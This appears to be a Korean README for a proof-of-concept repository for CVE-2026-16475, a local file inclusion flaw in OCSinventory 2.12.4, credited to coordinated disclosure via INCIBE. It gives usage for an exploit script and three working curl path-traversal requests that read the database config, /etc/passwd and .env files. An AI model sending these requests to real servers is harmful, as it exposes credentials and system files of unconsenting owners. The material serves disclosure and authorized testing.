
이것은 OCSinventory 2.12.4의 LFI 취약점인 CVE-2026-16475의 PoC가 포함된 공식 저장소입니다.
OCSinventory 2.12.4의 로컬 파일 포함(LFI) 취약점
CVE ID: CVE-2026-16475
CVSS 점수: 6.9 (중간)
CWE: CWE-98 (PHP 프로그램에서 Include/Require 문의 파일명 제어 불량)
영향받는 버전: OCSinventory 2.12.4
상태: 최신 버전에서 패치됨
/ajax/teledeployoptions.php 엔드포인트에는 동적 XML 파일 포함 작업에서 linkedoptions 매개변수를 사용하기 전에 제대로 검증하지 않아 발생하는 로컬 파일 포함(LFI) 취약점이 존재합니다.
이 엔드포인트는 XML 구성 파일을 로드하도록 설계되었지만 linkedoptions 매개변수를 제대로 검증하지 못해 경로 탐색(path traversal) 공격이 가능합니다.
인증되지 않은 원격 공격자는 이 취약점을 악용하여 다음을 수행할 수 있습니다:
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
옵션:
-u, --url - 대상 URL (필수)-v, --verbose - 상세 출력-o, --output - 성공적으로 읽은 결과를 파일로 저장예시:
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
스크립트에서 BASE_URL 변수를 편집하세요:
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
사용자:
개발자:
basename() 또는 유사한 함수 사용참고: CVE-2026-16475는 INCIBE를 통해 조정되며 아직 NVD에 색인되지 않았을 수 있습니다. 정확한 정보는 INCIBE 소스를 확인하세요.
교육 및 승인된 테스트 전용
전체 법적 고지는 DISCLAIMER.md를 참조하세요.
Adrián Ferrer Tarí
INCIBE를 통한 책임 있는 공개 조정